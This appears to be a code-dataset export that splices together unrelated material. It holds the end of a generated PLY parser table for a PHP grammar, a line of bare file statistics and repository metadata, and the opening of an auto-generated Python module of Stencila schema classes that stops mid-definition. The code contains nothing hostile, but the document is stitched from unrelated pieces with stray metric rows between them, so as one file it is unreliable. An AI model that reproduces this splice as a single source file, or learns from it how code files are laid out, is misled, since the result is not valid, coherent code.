('expr -> expr BOOLEAN_AND expr','expr',3,'p_expr_binary_op','phpparse.py',1151),
('expr -> expr BOOLEAN_OR expr','expr',3,'p_expr_binary_op','phpparse.py',1152),
('expr -> expr LOGICAL_AND expr','expr',3,'p_expr_binary_op','phpparse.py',1153),
('expr -> expr LOGICAL_OR expr','expr',3,'p_expr_binary_op','phpparse.py',1154),
('expr -> expr LOGICAL_XOR expr','expr',3,'p_expr_binary_op','phpparse.py',1155),
('expr -> expr AND expr','expr',3,'p_expr_binary_op','phpparse.py',1156),
('expr -> expr OR expr','expr',3,'p_expr_binary_op','phpparse.py',1157),
('expr -> expr XOR expr','expr',3,'p_expr_binary_op','phpparse.py',1158),
('expr -> expr CONCAT expr','expr',3,'p_expr_binary_op','phpparse.py',1159),
('expr -> expr PLUS expr','expr',3,'p_expr_binary_op','phpparse.py',1160),
('expr -> expr MINUS expr','expr',3,'p_expr_binary_op','phpparse.py',1161),
('expr -> expr MUL expr','expr',3,'p_expr_binary_op','phpparse.py',1162),
('expr -> expr DIV expr','expr',3,'p_expr_binary_op','phpparse.py',1163),
('expr -> expr SL expr','expr',3,'p_expr_binary_op','phpparse.py',1164),
('expr -> expr SR expr','expr',3,'p_expr_binary_op','phpparse.py',1165),
('expr -> expr MOD expr','expr',3,'p_expr_binary_op','phpparse.py',1166),
('expr -> expr IS_IDENTICAL expr','expr',3,'p_expr_binary_op','phpparse.py',1167),
('expr -> expr IS_NOT_IDENTICAL expr','expr',3,'p_expr_binary_op','phpparse.py',1168),
('expr -> expr IS_EQUAL expr','expr',3,'p_expr_binary_op','phpparse.py',1169),
('expr -> expr IS_NOT_EQUAL expr','expr',3,'p_expr_binary_op','phpparse.py',1170),
('expr -> expr IS_SMALLER expr','expr',3,'p_expr_binary_op','phpparse.py',1171),
('expr -> expr IS_SMALLER_OR_EQUAL expr','expr',3,'p_expr_binary_op','phpparse.py',1172),
('expr -> expr IS_GREATER expr','expr',3,'p_expr_binary_op','phpparse.py',1173),
('expr -> expr IS_GREATER_OR_EQUAL expr','expr',3,'p_expr_binary_op','phpparse.py',1174),
('expr -> expr INSTANCEOF expr','expr',3,'p_expr_binary_op','phpparse.py',1175),
('expr -> expr INSTANCEOF STATIC','expr',3,'p_expr_binary_op','phpparse.py',1176),
('expr -> PLUS expr','expr',2,'p_expr_unary_op','phpparse.py',1180),
('expr -> MINUS expr','expr',2,'p_expr_unary_op','phpparse.py',1181),
('expr -> NOT expr','expr',2,'p_expr_unary_op','phpparse.py',1182),
('expr -> BOOLEAN_NOT expr','expr',2,'p_expr_unary_op','phpparse.py',1183),
('expr -> expr QUESTION expr COLON expr','expr',5,'p_expr_ternary_op','phpparse.py',1187),
('expr -> expr QUESTION COLON expr','expr',4,'p_expr_short_ternary_op','phpparse.py',1191),
('expr -> INC variable','expr',2,'p_expr_pre_incdec','phpparse.py',1195),
('expr -> DEC variable','expr',2,'p_expr_pre_incdec','phpparse.py',1196),
('expr -> variable INC','expr',2,'p_expr_post_incdec','phpparse.py',1200),
('expr -> variable DEC','expr',2,'p_expr_post_incdec','phpparse.py',1201),
('expr -> INT_CAST expr','expr',2,'p_expr_cast_int','phpparse.py',1205),
('expr -> DOUBLE_CAST expr','expr',2,'p_expr_cast_double','phpparse.py',1209),
('expr -> STRING_CAST expr','expr',2,'p_expr_cast_string','phpparse.py',1213),
('expr -> ARRAY_CAST expr','expr',2,'p_expr_cast_array','phpparse.py',1217),
('expr -> OBJECT_CAST expr','expr',2,'p_expr_cast_object','phpparse.py',1221),
('expr -> BOOL_CAST expr','expr',2,'p_expr_cast_bool','phpparse.py',1225),
('expr -> UNSET_CAST expr','expr',2,'p_expr_cast_unset','phpparse.py',1229),
('expr -> BINARY_CAST expr','expr',2,'p_expr_cast_binary','phpparse.py',1233),
('expr -> ISSET LPAREN isset_variables RPAREN','expr',4,'p_expr_isset','phpparse.py',1237),
('isset_variables -> isset_variables COMMA variable','isset_variables',3,'p_isset_variables','phpparse.py',1241),
('isset_variables -> variable','isset_variables',1,'p_isset_variables','phpparse.py',1242),
('expr -> EMPTY LPAREN expr RPAREN','expr',4,'p_expr_empty','phpparse.py',1249),
('expr -> EVAL LPAREN expr RPAREN','expr',4,'p_expr_eval','phpparse.py',1253),
('expr -> INCLUDE expr','expr',2,'p_expr_include','phpparse.py',1257),
('expr -> INCLUDE_ONCE expr','expr',2,'p_expr_include_once','phpparse.py',1261),
('expr -> REQUIRE expr','expr',2,'p_expr_require','phpparse.py',1265),
('expr -> REQUIRE_ONCE expr','expr',2,'p_expr_require_once','phpparse.py',1269),
('exit_or_die -> EXIT','exit_or_die',1,'p_exit_or_die','phpparse.py',1273),
('exit_or_die -> DIE','exit_or_die',1,'p_exit_or_die','phpparse.py',1274),
('expr -> exit_or_die','expr',1,'p_expr_exit','phpparse.py',1279),
('expr -> exit_or_die LPAREN RPAREN','expr',3,'p_expr_exit','phpparse.py',1280),
('expr -> exit_or_die LPAREN expr RPAREN','expr',4,'p_expr_exit','phpparse.py',1281),
('expr -> PRINT expr','expr',2,'p_expr_print','phpparse.py',1290),
('expr -> AT expr','expr',2,'p_expr_silence','phpparse.py',1294),
('expr -> LPAREN expr RPAREN','expr',3,'p_expr_group','phpparse.py',1298),
('scalar -> class_constant','scalar',1,'p_scalar','phpparse.py',1302),
('scalar -> common_scalar','scalar',1,'p_scalar','phpparse.py',1303),
('scalar -> QUOTE encaps_list QUOTE','scalar',3,'p_scalar','phpparse.py',1304),
('scalar -> STRING QUOTE encaps_list QUOTE','scalar',4,'p_scalar','phpparse.py',1305),
('scalar -> scalar_heredoc','scalar',1,'p_scalar','phpparse.py',1306),
('scalar -> nowdoc','scalar',1,'p_scalar','phpparse.py',1307),
('scalar -> class_name_constant','scalar',1,'p_scalar','phpparse.py',1308),
('scalar_heredoc -> START_HEREDOC encaps_list END_HEREDOC','scalar_heredoc',3,'p_scalar_heredoc','phpparse.py',1318),
('nowdoc -> START_NOWDOC nowdoc_text_content END_NOWDOC','nowdoc',3,'p_nowdoc','phpparse.py',1332),
('nowdoc_text_content -> nowdoc_text_content ENCAPSED_AND_WHITESPACE','nowdoc_text_content',2,'p_nowdoc_text_content','phpparse.py',1338),
('nowdoc_text_content -> empty','nowdoc_text_content',1,'p_nowdoc_text_content','phpparse.py',1339),
('scalar -> STRING_VARNAME','scalar',1,'p_scalar_string_varname','phpparse.py',1346),
('scalar -> namespace_name','scalar',1,'p_scalar_namespace_name','phpparse.py',1350),
('scalar -> NS_SEPARATOR namespace_name','scalar',2,'p_scalar_namespace_name','phpparse.py',1351),
('scalar -> NAMESPACE NS_SEPARATOR namespace_name','scalar',3,'p_scalar_namespace_name','phpparse.py',1352),
('class_constant -> class_name DOUBLE_COLON STRING','class_constant',3,'p_class_constant','phpparse.py',1361),
('class_constant -> variable_class_name DOUBLE_COLON STRING','class_constant',3,'p_class_constant','phpparse.py',1362),
('common_scalar -> LNUMBER','common_scalar',1,'p_common_scalar_lnumber','phpparse.py',1366),
('common_scalar -> DNUMBER','common_scalar',1,'p_common_scalar_dnumber','phpparse.py',1377),
('common_scalar -> CONSTANT_ENCAPSED_STRING','common_scalar',1,'p_common_scalar_string','phpparse.py',1381),
('common_scalar -> STRING CONSTANT_ENCAPSED_STRING','common_scalar',2,'p_common_scalar_string','phpparse.py',1382),
('common_scalar -> LINE','common_scalar',1,'p_common_scalar_magic_line','phpparse.py',1390),
('common_scalar -> FILE','common_scalar',1,'p_common_scalar_magic_file','phpparse.py',1394),
('common_scalar -> DIR','common_scalar',1,'p_common_scalar_magic_dir','phpparse.py',1399),
('common_scalar -> CLASS_C','common_scalar',1,'p_common_scalar_magic_class','phpparse.py',1406),
('common_scalar -> METHOD_C','common_scalar',1,'p_common_scalar_magic_method','phpparse.py',1410),
('common_scalar -> FUNC_C','common_scalar',1,'p_common_scalar_magic_func','phpparse.py',1414),
('common_scalar -> NS_C','common_scalar',1,'p_common_scalar_magic_ns','phpparse.py',1418),
('static_scalar -> common_scalar','static_scalar',1,'p_static_scalar','phpparse.py',1422),
('static_scalar -> class_constant','static_scalar',1,'p_static_scalar','phpparse.py',1423),
('static_scalar -> QUOTE QUOTE','static_scalar',2,'p_static_scalar','phpparse.py',1424),
('static_scalar -> QUOTE ENCAPSED_AND_WHITESPACE QUOTE','static_scalar',3,'p_static_scalar','phpparse.py',1425),
('static_scalar -> static_heredoc','static_scalar',1,'p_static_scalar','phpparse.py',1426),
('static_scalar -> nowdoc','static_scalar',1,'p_static_scalar','phpparse.py',1427),
('static_scalar -> class_name_constant','static_scalar',1,'p_static_scalar','phpparse.py',1428),
('class_name_constant -> class_name DOUBLE_COLON CLASS','class_name_constant',3,'p_class_name_constant','phpparse.py',1437),
('static_heredoc -> START_HEREDOC multiple_encapsed END_HEREDOC','static_heredoc',3,'p_static_heredoc','phpparse.py',1443),
('multiple_encapsed -> multiple_encapsed ENCAPSED_AND_WHITESPACE','multiple_encapsed',2,'p_multiple_encapsed','phpparse.py',1449),
('multiple_encapsed -> empty','multiple_encapsed',1,'p_multiple_encapsed','phpparse.py',1450),
('static_scalar -> namespace_name','static_scalar',1,'p_static_scalar_namespace_name','phpparse.py',1457),
('static_scalar -> NS_SEPARATOR namespace_name','static_scalar',2,'p_static_scalar_namespace_name','phpparse.py',1458),
('static_scalar -> NAMESPACE NS_SEPARATOR namespace_name','static_scalar',3,'p_static_scalar_namespace_name','phpparse.py',1459),
('static_scalar -> PLUS static_scalar','static_scalar',2,'p_static_scalar_unary_op','phpparse.py',1468),
('static_scalar -> MINUS static_scalar','static_scalar',2,'p_static_scalar_unary_op','phpparse.py',1469),
('static_scalar -> ARRAY LPAREN static_array_pair_list RPAREN','static_scalar',4,'p_static_scalar_array','phpparse.py',1473),
('static_scalar -> LBRACKET static_array_pair_list RBRACKET','static_scalar',3,'p_static_scalar_array','phpparse.py',1474),
('static_array_pair_list -> empty','static_array_pair_list',1,'p_static_array_pair_list','phpparse.py',1482),
('static_array_pair_list -> static_non_empty_array_pair_list possible_comma','static_array_pair_list',2,'p_static_array_pair_list','phpparse.py',1483),
('static_non_empty_array_pair_list -> static_non_empty_array_pair_list COMMA static_expr','static_non_empty_array_pair_list',3,'p_static_non_empty_array_pair_list_item','phpparse.py',1490),
('static_non_empty_array_pair_list -> static_expr','static_non_empty_array_pair_list',1,'p_static_non_empty_array_pair_list_item','phpparse.py',1491),
('static_non_empty_array_pair_list -> static_non_empty_array_pair_list COMMA static_scalar DOUBLE_ARROW static_expr','static_non_empty_array_pair_list',5,'p_static_non_empty_array_pair_list_pair','phpparse.py',1498),
('static_non_empty_array_pair_list -> static_scalar DOUBLE_ARROW static_expr','static_non_empty_array_pair_list',3,'p_static_non_empty_array_pair_list_pair','phpparse.py',1499),
('static_expr -> static_scalar','static_expr',1,'p_static_expr','phpparse.py',1506),
('static_expr -> static_expr BOOLEAN_AND static_expr','static_expr',3,'p_static_expr','phpparse.py',1507),
('static_expr -> static_expr BOOLEAN_OR static_expr','static_expr',3,'p_static_expr','phpparse.py',1508),
('static_expr -> static_expr LOGICAL_AND static_expr','static_expr',3,'p_static_expr','phpparse.py',1509),
('static_expr -> static_expr LOGICAL_OR static_expr','static_expr',3,'p_static_expr','phpparse.py',1510),
('static_expr -> static_expr LOGICAL_XOR static_expr','static_expr',3,'p_static_expr','phpparse.py',1511),
('static_expr -> static_expr AND static_expr','static_expr',3,'p_static_expr','phpparse.py',1512),
('static_expr -> static_expr OR static_expr','static_expr',3,'p_static_expr','phpparse.py',1513),
('static_expr -> static_expr XOR static_expr','static_expr',3,'p_static_expr','phpparse.py',1514),
('static_expr -> static_expr CONCAT static_expr','static_expr',3,'p_static_expr','phpparse.py',1515),
('static_expr -> static_expr PLUS static_expr','static_expr',3,'p_static_expr','phpparse.py',1516),
('static_expr -> static_expr MINUS static_expr','static_expr',3,'p_static_expr','phpparse.py',1517),
('static_expr -> static_expr MUL static_expr','static_expr',3,'p_static_expr','phpparse.py',1518),
('static_expr -> static_expr DIV static_expr','static_expr',3,'p_static_expr','phpparse.py',1519),
('static_expr -> static_expr SL static_expr','static_expr',3,'p_static_expr','phpparse.py',1520),
('static_expr -> static_expr SR static_expr','static_expr',3,'p_static_expr','phpparse.py',1521),
('static_expr -> static_expr MOD static_expr','static_expr',3,'p_static_expr','phpparse.py',1522),
('static_expr -> static_expr IS_IDENTICAL static_expr','static_expr',3,'p_static_expr','phpparse.py',1523),
('static_expr -> static_expr IS_NOT_IDENTICAL static_expr','static_expr',3,'p_static_expr','phpparse.py',1524),
('static_expr -> static_expr IS_EQUAL static_expr','static_expr',3,'p_static_expr','phpparse.py',1525),
('static_expr -> static_expr IS_NOT_EQUAL static_expr','static_expr',3,'p_static_expr','phpparse.py',1526),
('static_expr -> static_expr IS_SMALLER static_expr','static_expr',3,'p_static_expr','phpparse.py',1527),
('static_expr -> static_expr IS_SMALLER_OR_EQUAL static_expr','static_expr',3,'p_static_expr','phpparse.py',1528),
('static_expr -> static_expr IS_GREATER static_expr','static_expr',3,'p_static_expr','phpparse.py',1529),
('static_expr -> static_expr IS_GREATER_OR_EQUAL static_expr','static_expr',3,'p_static_expr','phpparse.py',1530),
('static_expr -> LPAREN static_expr RPAREN','static_expr',3,'p_static_expr_group','phpparse.py',1538),
('namespace_name -> namespace_name NS_SEPARATOR STRING','namespace_name',3,'p_namespace_name','phpparse.py',1542),
('namespace_name -> STRING','namespace_name',1,'p_namespace_name','phpparse.py',1543),
('namespace_name -> ARRAY','namespace_name',1,'p_namespace_name','phpparse.py',1544),
('encaps_list -> encaps_list encaps_var','encaps_list',2,'p_encaps_list','phpparse.py',1551),
('encaps_list -> empty','encaps_list',1,'p_encaps_list','phpparse.py',1552),
('encaps_list -> encaps_list ENCAPSED_AND_WHITESPACE','encaps_list',2,'p_encaps_list_string','phpparse.py',1562),
('encaps_var -> VARIABLE','encaps_var',1,'p_encaps_var','phpparse.py',1571),
('encaps_var -> VARIABLE LBRACKET encaps_var_offset RBRACKET','encaps_var',4,'p_encaps_var_array_offset','phpparse.py',1575),
('encaps_var -> VARIABLE OBJECT_OPERATOR STRING','encaps_var',3,'p_encaps_var_object_property','phpparse.py',1580),
('encaps_var -> DOLLAR_OPEN_CURLY_BRACES expr RBRACE','encaps_var',3,'p_encaps_var_dollar_curly_expr','phpparse.py',1585),
('encaps_var -> DOLLAR_OPEN_CURLY_BRACES STRING_VARNAME LBRACKET expr RBRACKET RBRACE','encaps_var',6,'p_encaps_var_dollar_curly_array_offset','phpparse.py',1589),
('encaps_var -> CURLY_OPEN variable RBRACE','encaps_var',3,'p_encaps_var_curly_variable','phpparse.py',1594),
('encaps_var_offset -> STRING','encaps_var_offset',1,'p_encaps_var_offset_string','phpparse.py',1598),
('encaps_var_offset -> NUM_STRING','encaps_var_offset',1,'p_encaps_var_offset_num_string','phpparse.py',1602),
('encaps_var_offset -> VARIABLE','encaps_var_offset',1,'p_encaps_var_offset_variable','phpparse.py',1606),
('empty -> <empty>','empty',0,'p_empty','phpparse.py',1610),
]
| 666.830867 | 232,832 | 0.691748 | 73,979 | 315,411 | 2.907122 | 0.019141 | 0.013029 | 0.009165 | 0.012164 | 0.786466 | 0.73729 | 0.699748 | 0.674407 | 0.638199 | 0.6228 | 0 | 0.573729 | 0.009717 | 315,411 | 472 | 232,833 | 668.243644 | 0.114821 | 0.000197 | 0 | 0.00432 | 1 | 0 | 0.131009 | 0.028626 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.00216 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
7181dcece67e04145e8242813c7d3fd9ed629781 | 80,679 | py | Python | py/stencila/schema/types.py | 100ideas/schema | 601817b9ffd55e42905320df1496442887d1141d | [
"Apache-2.0"
] | null | null | null | py/stencila/schema/types.py | 100ideas/schema | 601817b9ffd55e42905320df1496442887d1141d | [
"Apache-2.0"
] | null | null | null | py/stencila/schema/types.py | 100ideas/schema | 601817b9ffd55e42905320df1496442887d1141d | [
"Apache-2.0"
] | null | null | null | # This file was automatically generated by `python.ts`.
# Do not modify it by hand. Instead, modify the source `.schema.yaml` files
# in the `schema` directory and run `npm run build:py` to regenerate it.
from typing import Any, Dict, List as Array, Optional, Union
from enum import Enum
ECitationMode = Enum("CitationMode", ["normal", "suppressAuthor"])
EItemListOrder = Enum("ItemListOrder", ["ascending", "descending", "unordered"])
ECellType = Enum("CellType", ["data", "header"])
ERowType = Enum("RowType", ["header", "footer"])
class Entity:
"""The most basic item, defining the minimum properties required."""
id: Optional[str] = None
meta: Optional[Dict[str, Any]] = None
def __init__(
self,
id: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None
) -> None:
super().__init__(
)
if id is not None:
self.id = id
if meta is not None:
self.meta = meta
class ArraySchema(Entity):
"""A schema specifying constraints on an array node."""
contains: Optional["SchemaTypes"] = None
items: Optional["SchemaTypes"] = None
maxItems: Optional[float] = None
minItems: Optional[float] = None
uniqueItems: Optional[bool] = None
def __init__(
self,
contains: Optional["SchemaTypes"] = None,
id: Optional[str] = None,
items: Optional["SchemaTypes"] = None,
maxItems: Optional[float] = None,
meta: Optional[Dict[str, Any]] = None,
minItems: Optional[float] = None,
uniqueItems: Optional[bool] = None
) -> None:
super().__init__(
id=id,
meta=meta
)
if contains is not None:
self.contains = contains
if items is not None:
self.items = items
if maxItems is not None:
self.maxItems = maxItems
if minItems is not None:
self.minItems = minItems
if uniqueItems is not None:
self.uniqueItems = uniqueItems
class BooleanSchema(Entity):
"""A schema specifying that a node must be a boolean value."""
def __init__(
self,
id: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None
) -> None:
super().__init__(
id=id,
meta=meta
)
class Cite(Entity):
"""A reference to a CreativeWork that is cited in another CreativeWork."""
target: str
citationMode: Optional["ECitationMode"] = None
content: Optional[Array["InlineContent"]] = None
pageEnd: Optional[Union[str, int]] = None
pageStart: Optional[Union[str, int]] = None
pagination: Optional[str] = None
prefix: Optional[str] = None
suffix: Optional[str] = None
def __init__(
self,
target: str,
citationMode: Optional["ECitationMode"] = None,
content: Optional[Array["InlineContent"]] = None,
id: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None,
pageEnd: Optional[Union[str, int]] = None,
pageStart: Optional[Union[str, int]] = None,
pagination: Optional[str] = None,
prefix: Optional[str] = None,
suffix: Optional[str] = None
) -> None:
super().__init__(
id=id,
meta=meta
)
if target is not None:
self.target = target
if citationMode is not None:
self.citationMode = citationMode
if content is not None:
self.content = content
if pageEnd is not None:
self.pageEnd = pageEnd
if pageStart is not None:
self.pageStart = pageStart
if pagination is not None:
self.pagination = pagination
if prefix is not None:
self.prefix = prefix
if suffix is not None:
self.suffix = suffix
class CiteGroup(Entity):
"""A group of `Cite` nodes"""
items: Array["Cite"]
def __init__(
self,
items: Array["Cite"],
id: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None
) -> None:
super().__init__(
id=id,
meta=meta
)
if items is not None:
self.items = items
class Code(Entity):
"""Inline code."""
text: str
programmingLanguage: Optional[str] = None
def __init__(
self,
text: str,
id: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None,
programmingLanguage: Optional[str] = None
) -> None:
super().__init__(
id=id,
meta=meta
)
if text is not None:
self.text = text
if programmingLanguage is not None:
self.programmingLanguage = programmingLanguage
class CodeBlock(Code):
"""A code block."""
def __init__(
self,
text: str,
id: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None,
programmingLanguage: Optional[str] = None
) -> None:
super().__init__(
text=text,
id=id,
meta=meta,
programmingLanguage=programmingLanguage
)
class CodeChunk(CodeBlock):
"""A executable chunk of code."""
alters: Optional[Array[str]] = None
assigns: Optional[Array[Union[str, "Variable"]]] = None
declares: Optional[Array[Union[str, "Variable", "Function"]]] = None
duration: Optional[float] = None
errors: Optional[Array["CodeError"]] = None
imports: Optional[Array[Union[str, "SoftwareSourceCode", "SoftwareApplication"]]] = None
outputs: Optional[Array["Node"]] = None
reads: Optional[Array[str]] = None
uses: Optional[Array[Union[str, "Variable"]]] = None
def __init__(
self,
text: str,
alters: Optional[Array[str]] = None,
assigns: Optional[Array[Union[str, "Variable"]]] = None,
declares: Optional[Array[Union[str, "Variable", "Function"]]] = None,
duration: Optional[float] = None,
errors: Optional[Array["CodeError"]] = None,
id: Optional[str] = None,
imports: Optional[Array[Union[str, "SoftwareSourceCode", "SoftwareApplication"]]] = None,
meta: Optional[Dict[str, Any]] = None,
outputs: Optional[Array["Node"]] = None,
programmingLanguage: Optional[str] = None,
reads: Optional[Array[str]] = None,
uses: Optional[Array[Union[str, "Variable"]]] = None
) -> None:
super().__init__(
text=text,
id=id,
meta=meta,
programmingLanguage=programmingLanguage
)
if alters is not None:
self.alters = alters
if assigns is not None:
self.assigns = assigns
if declares is not None:
self.declares = declares
if duration is not None:
self.duration = duration
if errors is not None:
self.errors = errors
if imports is not None:
self.imports = imports
if outputs is not None:
self.outputs = outputs
if reads is not None:
self.reads = reads
if uses is not None:
self.uses = uses
class CodeFragment(Code):
"""Inline code."""
def __init__(
self,
text: str,
id: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None,
programmingLanguage: Optional[str] = None
) -> None:
super().__init__(
text=text,
id=id,
meta=meta,
programmingLanguage=programmingLanguage
)
class CodeExpression(CodeFragment):
"""An expression defined in programming language source code."""
errors: Optional[Array["CodeError"]] = None
output: Optional["Node"] = None
def __init__(
self,
text: str,
errors: Optional[Array["CodeError"]] = None,
id: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None,
output: Optional["Node"] = None,
programmingLanguage: Optional[str] = None
) -> None:
super().__init__(
text=text,
id=id,
meta=meta,
programmingLanguage=programmingLanguage
)
if errors is not None:
self.errors = errors
if output is not None:
self.output = output
class CodeError(Entity):
"""An error that occured when parsing, compiling or executing some Code."""
kind: str
message: Optional[str] = None
trace: Optional[str] = None
def __init__(
self,
kind: str,
id: Optional[str] = None,
message: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None,
trace: Optional[str] = None
) -> None:
super().__init__(
id=id,
meta=meta
)
if kind is not None:
self.kind = kind
if message is not None:
self.message = message
if trace is not None:
self.trace = trace
class ConstantSchema(Entity):
"""A schema specifying a constant value that a node must have."""
value: Optional["Node"] = None
def __init__(
self,
id: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None,
value: Optional["Node"] = None
) -> None:
super().__init__(
id=id,
meta=meta
)
if value is not None:
self.value = value
class Date(Entity):
"""A date encoded as a ISO 8601 string."""
value: str
def __init__(
self,
value: str,
id: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None
) -> None:
super().__init__(
id=id,
meta=meta
)
if value is not None:
self.value = value
class Mark(Entity):
"""
A base class for nodes that mark some other inline content in some way
(e.g. as being emphasised, or quoted).
"""
content: Array["InlineContent"]
def __init__(
self,
content: Array["InlineContent"],
id: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None
) -> None:
super().__init__(
id=id,
meta=meta
)
if content is not None:
self.content = content
class Delete(Mark):
"""Content that is marked for deletion"""
def __init__(
self,
content: Array["InlineContent"],
id: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None
) -> None:
super().__init__(
content=content,
id=id,
meta=meta
)
class Emphasis(Mark):
"""Emphasised content."""
def __init__(
self,
content: Array["InlineContent"],
id: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None
) -> None:
super().__init__(
content=content,
id=id,
meta=meta
)
class Thing(Entity):
"""The most generic type of item."""
alternateNames: Optional[Array[str]] = None
description: Optional[Union[str, Array["Node"]]] = None
name: Optional[str] = None
url: Optional[str] = None
def __init__(
self,
alternateNames: Optional[Array[str]] = None,
description: Optional[Union[str, Array["Node"]]] = None,
id: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None,
name: Optional[str] = None,
url: Optional[str] = None
) -> None:
super().__init__(
id=id,
meta=meta
)
if alternateNames is not None:
self.alternateNames = alternateNames
if description is not None:
self.description = description
if name is not None:
self.name = name
if url is not None:
self.url = url
class Brand(Thing):
"""
A brand used by an organization or person for labeling a product, product
group, or similar.
"""
name: str
logo: Optional[Union[str, "ImageObject"]] = None
reviews: Optional[Array[str]] = None
def __init__(
self,
name: str,
alternateNames: Optional[Array[str]] = None,
description: Optional[Union[str, Array["Node"]]] = None,
id: Optional[str] = None,
logo: Optional[Union[str, "ImageObject"]] = None,
meta: Optional[Dict[str, Any]] = None,
reviews: Optional[Array[str]] = None,
url: Optional[str] = None
) -> None:
super().__init__(
name=name,
alternateNames=alternateNames,
description=description,
id=id,
meta=meta,
url=url
)
if name is not None:
self.name = name
if logo is not None:
self.logo = logo
if reviews is not None:
self.reviews = reviews
class ContactPoint(Thing):
"""A contact point, for example, a R&D department."""
availableLanguages: Optional[Array[str]] = None
emails: Optional[Array[str]] = None
telephoneNumbers: Optional[Array[str]] = None
def __init__(
self,
alternateNames: Optional[Array[str]] = None,
availableLanguages: Optional[Array[str]] = None,
description: Optional[Union[str, Array["Node"]]] = None,
emails: Optional[Array[str]] = None,
id: Optional[str] = None,
meta: Optional[Dict[str, Any]] = None,
name: Optional[str] = None,
telephoneNumbers: Optional[Array[str]] = None,
url: Optional[str] = None
) -> None:
super().__init__(
alternateNames=alternateNames,
description=description,
id=id,
meta=meta,
name=name,
url=url
)
if availableLanguages is not None:
self.availableLanguages = availableLanguages
if emails is not None:
self.emails = emails
if telephoneNumbers is not None:
self.telephoneNumbers = telephoneNumbers
class CreativeWork(Thing):
"""
A creative work, including books, movies, photographs, software programs,
etc.
"""
authors: Optional[Array[Union["Person", "Organization"]]] = None
content: Optional[Array["Node"]] = None
dateCreated: Optional[Union["Date", str]] = None
dateModified: Optional[Union["Date", str]] = None
datePublished: Optional[Union["Date", str]] = None
editors: Optional[Array["Person"]] = None
funders: Optional[Array[Union["Person", "Organization"]]] = None
isPartOf: Optional["CreativeWorkTypes"] = None
keywords: Optional[Array[str]] = None
licenses: Optional[Array[Union[str, "CreativeWorkTypes"]]] = None
parts: Optional[Array["CreativeWorkTypes"]] = None
publisher: Optional[Union["Person", "Organization"]] = None
references: Optional[Array[Union[str, "CreativeWorkTypes"]]] = None
text: Optional[str] = None
title: Optional[Union[str, Array["Node"]]] = None
version: Optional[Union[str, float]] = None
def __init__(
self,
alternateNames: Optional[Array[str]] = None,
authors: Optional[Array[Union["Person", "Organization"]]] = None,
content: Optional[Array["Node"]] = None,
dateCreated: Optional[Union["Date", str]] = None,
dateModified: Optional[Union["Date", str]] = None,
datePublished: Optional[Union["Date", str]] = None,
description: Optional[Union[str, Array["Node"]]] = None,
editors: Optional[Array["Person"]] = None,
funders: Optional[Array[Union["Person", "Organization"]]] = None,
id: Optional[str] = None,
isPartOf: Optional["CreativeWorkTypes"] = None,
keywords: Optional[Array[str]] = None,
licenses: Optional[Array[Union[str, "CreativeWorkTypes"]]] = None,
meta: Optional[Dict[str, Any]] = None,
name: Optional[str] = None,
parts: Optional[Array["CreativeWorkTypes"]] = None,
publisher: Optional[Union["Person", "Organization"]] = None,
references: Optional[Array[Union[str, "CreativeWorkTypes"]]] = None,
text: Optional[str] = None,
title: Optional[Union[str, Array["Node"]]] = None,
url: Optional[str] = None,
version: Optional[Union[str, float]] = None
) -> None:
super().__init__(
alternateNames=alternateNames,
description=description,
id=id,
meta=meta,
name=name,
url=url
)
if authors is not None:
self.authors = authors
if content is not None:
self.content = content
if dateCreated is not None:
self.dateCreated = dateCreated
if dateModified is not None:
self.dateModified = dateModified
if datePublished is not None:
self.datePublished = datePublished
if editors is not None:
self.editors = editors
if funders is not None:
self.funders = funders
if isPartOf is not None:
self.isPartOf = isPartOf
if keywords is not None:
self.keywords = keywords
if licenses is not None:
self.licenses = licenses
if parts is not None:
self.parts = parts
if publisher is not None:
self.publisher = publisher
if references is not None:
self.references = references
if text is not None:
self.text = text
if title is not None:
self.title = title
if version is not None:
self.version = version
class Article(CreativeWork):
"""An article, including news and scholarly articles."""
authors: Array[Union["Person", "Organization"]]
title: Union[str, Array["Node"]]
environment: Optional["Environment"] = None
def __init__(
self,
authors: Array[Union["Person", "Organization"]],
title: Union[str, Array["Node"]],
alternateNames: Optional[Array[str]] = None,
content: Optional[Array["Node"]] = None,
dateCreated: Optional[Union["Date", str]] = None,
dateModified: Optional[Union["Date", str]] = None,
datePublished: Optional[Union["Date", str]] = None,
description: Optional[Union[str, Array["Node"]]] = None,
editors: Optional[Array["Person"]] = None,
environment: Optional["Environment"] = None,
funders: Optional[Array[Union["Person", "Organization"]]] = None,
id: Optional[str] = None,
isPartOf: Optional["CreativeWorkTypes"] = None,
keywords: Optional[Array[str]] = None,
licenses: Optional[Array[Union[str, "CreativeWorkTypes"]]] = None,
meta: Optional[Dict[str, Any]] = None,
name: Optional[str] = None,
parts: Optional[Array["CreativeWorkTypes"]] = None,
publisher: Optional[Union["Person", "Organization"]] = None,
references: Optional[Array[Union[str, "CreativeWorkTypes"]]] = None,
text: Optional[str] = None,
url: Optional[str] = None,
version: Optional[Union[str, float]] = None
) -> None:
super().__init__(
authors=authors,
title=title,
alternateNames=alternateNames,
content=content,
dateCreated=dateCreated,
dateModified=dateModified,
datePublished=datePublished,
description=description,
editors=editors,
funders=funders,
id=id,
isPartOf=isPartOf,
keywords=keywords,
licenses=licenses,
meta=meta,
name=name,
parts=parts,
publisher=publisher,
references=references,
text=text,
url=url,
version=version
)
if authors is not None:
self.authors = authors
if title is not None:
self.title = title
if environment is not None:
self.environment = environment
class Collection(CreativeWork):
